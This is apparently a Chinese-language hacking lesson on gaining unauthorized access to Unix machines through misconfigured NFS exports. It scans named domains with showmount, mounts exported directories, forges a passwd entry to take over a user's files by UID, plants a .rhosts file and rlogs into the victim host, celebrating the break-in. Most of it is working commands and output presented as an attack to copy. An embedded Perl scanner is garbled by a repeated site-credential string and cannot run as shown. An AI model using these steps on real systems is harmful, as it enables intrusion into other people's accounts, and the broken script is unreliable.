OK，假設(shè)我們已有root權(quán)限，讓我們開(kāi)始!
可用shownmount命令顯示另一系統(tǒng)是否有mountable的磁盤．
在root帳號(hào)下:
$root> showmount -e wwa.com
ount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive
噢，這個(gè)域名不成功，OK，沒(méi)問(wèn)題，找下一個(gè):
$root> showmount -e seva.net
Export list for seva.net:
/var/mail pluto.seva.net
/home/user1 pluto.seva.net
/usr/local pluto.seva.net，rover.seva.net
/export/X11R6.3 rover.seva.net
/export/rover rover.seva.net，pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)
　
注意上面的“everyone”，如果我們想從這家伙里安裝linux 的話會(huì)很好．但我們是想打開(kāi)用戶的目錄．．．所以繼續(xù)下一個(gè):
$root> showmount -e XXXXX.XXX ) {
chomp(?用戶名:@HackBase.net密?碼:
);
print "Now checking:?用戶名:@HackBase.net密?碼:
";
# Note difference in program output capture from "geturl.pl".
open (EXECFILE， "$program?用戶名:@HackBase.net密?碼:
|");
@execResult = ;
next if (!defined($execResult[0]));
if ($execResult[0] =~ /^Export/) {
print " - Export list saved.";
open (OUTFILE， ">?用戶名:@HackBase.net密?碼:
.export");
foreach (@execResult) {
print OUTFILE;
}
close (OUTFILE);
}
close(EXECFILE);
print "\n";
}
# We are done. Close all files and end the program.
close (DOMAINFILE);
0;
----------------- end of cmount.pl
OK，現(xiàn)在開(kāi)始mounting(連接)磁盤．
假設(shè)我們運(yùn)行showmount -e domain.com 并返回:
Export list for domain.com:
/ (everyone)
/p1 (everyone)
/p2 (everyone)
/p3 (everyone)
/p5 (everyone)
/p6 (everyone)
/p7 (everyone)
/var/spool/mail titan，europa，galifrey
/tmp (everyone)
我們想連接(mount) / 目錄．．喲呵…這家伙把整個(gè)系統(tǒng)都共享(mountable)了
$root> mkdir /tmp/mount
root> mount -nt nfs domain.com:/ /tmp/mount
如果他把home目錄設(shè)為共享（mountable）的話，命令為：
$root> mount -nt nfs domain.com:/home /tmp/mount
要umount系統(tǒng)的話，確信退出目錄然后：
$root> umount /tmp/mount
　
先必須確定你已創(chuàng)建了共享(mount)目錄（你可在系統(tǒng)任何地方創(chuàng)建）．如果系統(tǒng)的/mnt目錄是空的，你也可用它．
OK，下面動(dòng)真格了：
bash# ls -al /mnt ; 確定/mnt是空的
ls: /mnt: No such file or directory ; 不存在這樣的文件或目錄 ;)
bash# mkdir /mnt ; 讓我們?yōu)樗ㄒ粋€(gè)（/mnt目錄）
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; 開(kāi)始 mount 這小家伙 ．．．
bash# cd /mnt ; 進(jìn)入mounted的目錄．
bash# ls ; 簡(jiǎn)單的dir ．．
TT_DB home raddb share
back local radius-961029.gz www
exec lost found radius-961029.ps
bash# ; the home dir就在那了 ．．． oh 很好．．．
bash# cd home
bash# ls -l ; 列長(zhǎng)目錄．．． 這兒tom 看起來(lái)不錯(cuò) ;)
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 302 other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 viewx
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash# ; 注意到tom 是 302號(hào)使用者 ．．． hmmm 把他放進(jìn)我們的passwd 文檔中．
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash ; 搞定 ;)
bash# su - tom ; su 到 tom 帳號(hào) ．．．
bash$ ls -l
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 tom other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 view
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash$ ; 注意上面，toms 的用戶號(hào)沒(méi)有了．．． 現(xiàn)在我們擁有了他的目錄!
bash$ echo >>tom/.rhosts ; 在tom的目錄里建一個(gè)名為 .rhosts 的文檔
（bash$ ;在.rhosts中加入 號(hào)，每個(gè)人都能用rlogin到他的帳戶。）
bash$ rlogin xxxxx.xxx 在我們的機(jī)器上我們是tom了 ， 因此rlogin 上平臺(tái)．
Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc. SunOS 5.5 Generic November 1995
> 雅皮士們 ，我們進(jìn)去了!
> ls -al
total 8
drwxr-xr-x 2 tom group 512 Mar 1 17:10 .
drwxr-xr-x 14 tom group 512 Jan 24 11:16 ..
-rw-r--r-- 1 tom group 144 Dec 30 15:32 .profile
-rw-r--r-- 1 tom bin 8 Mar 11 08:26 .rhosts
>
現(xiàn)在我們有了訪問(wèn)權(quán)限了，可以開(kāi)始hack這個(gè)系統(tǒng)了．哦，這該是下一課了，先輕松一下吧。

最新評(píng)論